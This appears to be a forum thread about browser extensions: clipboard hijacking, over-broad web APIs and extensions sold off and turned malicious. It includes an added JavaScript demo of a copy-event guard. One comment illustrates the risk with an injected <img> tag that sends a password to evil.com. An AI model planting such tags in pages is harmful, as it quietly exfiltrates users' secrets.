I was hoping this would also prevent websites from messing with the input to the clipboard. It's a bit annoying to copy a sentence from a website only to have "Read more on XYZ!" appended to it.
I'd actually like an extension along the lines of "This is not Google Docs, for fuck's sake", that just disables all these APIs that are only ever useful with rich apps, but not with content-heavy websites, for example:
- copy/paste hijacking
- sensor access: microphone, camera, GPS, etc.
Maybe even go further and introduce some sort of rate-limiting for
Incidentally, what are these APIs? I am building a rich content app (SVG editor) and have been starting to think about what copy + paste will look like.
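Added example, not part of the thread: pages append text like "Read more on XYZ!" with a `copy` event listener that calls `clipboardData.setData()` and `preventDefault()`, and an extension can stop it with a capture-phase listener registered first. The sketch simulates this with Node's built-in `EventTarget`; `FakeClipboardData`, `installSiteCopyHandler`, `installCopyGuard` and `simulateCopy` are hypothetical names.

```javascript
// Node's EventTarget/Event stand in for the page's `document` so this runs offline.
// In a browser the same listeners would be attached to `document` or `window`.

// Constructed stand-in for the DataTransfer object exposed as event.clipboardData.
class FakeClipboardData {
  constructor() { this.store = new Map(); }
  setData(type, value) { this.store.set(type, value); }
  getData(type) { return this.store.get(type) ?? ""; }
}

// What the site does: replace the copied text with selection + promo text
// and cancel the browser's default copy so its own data is used instead.
function installSiteCopyHandler(doc, getSelection) {
  doc.addEventListener("copy", (event) => {
    event.clipboardData.setData("text/plain", getSelection() + " Read more on XYZ!");
    event.preventDefault();
  });
}

// Defensive listener: stops the event before any later listener sees it.
// In an extension this has to be registered before page scripts run
// (content script at document_start), otherwise the site's handler wins.
// It also disables copy handlers that rich editors rely on.
function installCopyGuard(doc) {
  doc.addEventListener("copy", (event) => event.stopImmediatePropagation(), { capture: true });
}

// Dispatch one copy event and return what would end up on the clipboard.
function simulateCopy(doc, selection) {
  const event = new Event("copy", { cancelable: true });
  event.clipboardData = new FakeClipboardData();
  doc.dispatchEvent(event);
  // Browser default when nobody cancelled the event: the plain selection is copied.
  return event.defaultPrevented ? event.clipboardData.getData("text/plain") : selection;
}

function runDemo() {
  const selection = "A sentence from the article."; // constructed sample text
  const unguarded = new EventTarget();
  installSiteCopyHandler(unguarded, () => selection);
  const guarded = new EventTarget();
  installCopyGuard(guarded);                         // registered first
  installSiteCopyHandler(guarded, () => selection);
  return { unguarded: simulateCopy(unguarded, selection),
           guarded: simulateCopy(guarded, selection) };
}
console.log(runDemo());
```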
Even if the plugin couldn't phone home directly, if they have the power to change the HTML of the page, they can insert <img src="http://evil.com/phonehome?yourpassword=whatever"> and phone home that way. There's no permission that lets a plugin modify pages while preventing it from inserting tags that cause new requests.
The plugin's code is probably quite short - maybe you could inspect it yourself, manually?
Problem is extensions silently update in the background. They are frequently sold to adware companies, and then malicious scripts are added in without the user's knowledge.
Hadn't done this before, but it's trivial to manually load the plugin[1] from the cloned git repo[2].
It's a bit disappointing that Chrome doesn't let you sandbox things well enough to install plugins safely; there's no reason that plugins should be allowed to transmit data without asking for permission.